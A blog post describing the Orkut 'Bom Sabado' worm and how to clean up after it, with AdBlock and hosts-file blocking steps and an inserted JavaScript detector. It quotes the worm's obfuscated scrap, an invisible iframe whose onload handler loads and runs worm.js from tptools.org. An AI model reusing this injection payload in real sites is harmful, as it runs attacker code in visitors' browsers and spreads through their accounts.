Solution for Orkut worm Bom Sabado

9:17 PM Technology Enthusiast

Today Orkut users were flooded with scraps saying “Bom Sabado!”. Unlike other malware, this doesn't need you to click a link: just by opening the Orkut profile of an affected user, you will be affected. So I suggest you not use Orkut until this problem is fixed.

 

How does it work?
When anyone opens a page that is infected by this worm, a JavaScript runs automatically. Your browser will hang for some seconds or minutes. The script will automatically join you to its communities. Here you can see links of these communities.

After joining the communities, it sends a scrap to your friends with the text “Bom Sabado!” and an iframe code that loads the JavaScript again for your friends, who then join the communities and send the scrap on to their friends.

With the scrap “Bom Sabado!” it loads a small iframe code.

The source of the scrap is below:

<iframe style="display:none" onload="a = document.createElement( &#39;script&#39;);a.src = &#39;/&#39; + &#39;/tptools.o&#39;+&#39;rg/worm.js&#39;+&#39;#&lt;wbr&gt;#&#39;; document . body . appendChild( a )"></iframe>Bom Sabado!

It loads JavaScript from ..http..//tptools.org/worm.js (this site has been suspended now).
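The scrap above splits the host name across string literals and entity-encodes its quotes, so a plain substring filter for tptools.org never matches the raw source. The following added example (not part of the original post; the function names are illustrative) normalizes a scrap's inline event handlers before checking them against a blocklist:

```javascript
// Added example, not from the original post; the blocked host is the one named on this page.
const BLOCKED_HOSTS = ['tptools.org'];
// Scrap source as quoted above, kept entity-encoded as posted.
const WORM_SCRAP =
  '<iframe style="display:none" onload="a = document.createElement( &#39;script&#39;);' +
  'a.src = &#39;/&#39; + &#39;/tptools.o&#39;+&#39;rg/worm.js&#39;+&#39;#&lt;wbr&gt;#&#39;; ' +
  'document . body . appendChild( a )"></iframe>Bom Sabado!';
// Constructed benign scrap for comparison.
const BENIGN_SCRAP = '<b>Bom dia!</b> see http://example.com/photos';

// Naive filter: substring match on the raw scrap misses the split host name.
const naiveMatch = (html) => BLOCKED_HOSTS.some((h) => html.includes(h));

// Decode numeric and a few named HTML entities in a single pass.
const NAMED = new Map([['lt', '<'], ['gt', '>'], ['amp', '&'], ['quot', '"'], ['apos', "'"]]);
function decodeEntities(s) {
  return s.replace(/&(?:#(\d+)|#x([0-9a-f]+)|([a-z]+));/gi, (m, dec, hex, name) => {
    if (name) return NAMED.get(name.toLowerCase()) ?? m;
    const code = dec ? parseInt(dec, 10) : parseInt(hex, 16);
    return code <= 0x10ffff ? String.fromCodePoint(code) : m;
  });
}

// Fold 'a' + 'b' into 'ab' until stable, so split literals become one string.
function foldConcats(js) {
  const pair = /(['"])([^'"\\]*)\1\s*\+\s*(['"])([^'"\\]*)\3/;
  let prev;
  do {
    prev = js;
    js = js.replace(pair, (m, q, a, q2, b) => q + a + b + q);
  } while (js !== prev);
  return js;
}

// Report inline event handlers (onload, onerror, ...) that reference a blocked host.
function scanScrap(html) {
  const findings = [];
  for (const [, attr, quoted] of html.matchAll(/\s(on[a-z]+)\s*=\s*("[^"]*"|'[^']*')/gi)) {
    const js = foldConcats(decodeEntities(quoted.slice(1, -1)));
    for (const [, host] of js.matchAll(/(?:https?:)?\/\/([a-z0-9.-]+)/gi)) {
      const h = host.toLowerCase();
      if (BLOCKED_HOSTS.some((b) => h === b || h.endsWith('.' + b))) findings.push({ attr: attr.toLowerCase(), host: h });
    }
  }
  return findings;
}

console.log(naiveMatch(WORM_SCRAP), scanScrap(WORM_SCRAP), scanScrap(BENIGN_SCRAP));
```

This is a detection heuristic for known hosts only; the durable fix on the server side is to strip event-handler attributes and script-capable markup from user-submitted scraps altogether.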

Solution for now
Delete your cookies.
Change your password.

However, if you are already affected, you can get rid of this using the following steps. (This is applicable only for Firefox users. If you are using any other browser, see below):

  • Download the AdBlock Plus add-on for Firefox and install it.
  • Restart the browser to enable AdBlock.
  • You will see a red icon with ABP on the right-hand side of the search box in Firefox.
  • Click on that, and select Preferences.
  • Click Add Filter and enter *tptools.org/*.

Now you can safely open Orkut.

You may have to remove yourself from the communities added by the worm, such as saadzin, meu miguxinho, O vírus que contagia, Eu tenho um grande AMOR, Juizo eu TENHO, só não USO!, Dino ♥ etc.

Note: The "Old Orkut" users are not affected by this worm, and are safe.
Update: The website tptools.org is down now. Orkut is beautiful, again :-)

If you have a browser other than Firefox, or want to ensure that the site won't get accessed in any other way, you can edit the hosts file and add the following lines:

127.0.0.1 tptools.org
127.0.0.1 www.tptools.org

The hosts file is found in:

  • C:\Windows\ - Windows 95, 98, Me
  • C:\WinNT\system32\drivers\etc\ - Windows NT, 2000, XP Pro
  • C:\WINDOWS\System32\drivers\etc\ - Windows XP Home, Vista, 7
  • /etc/ - Linux
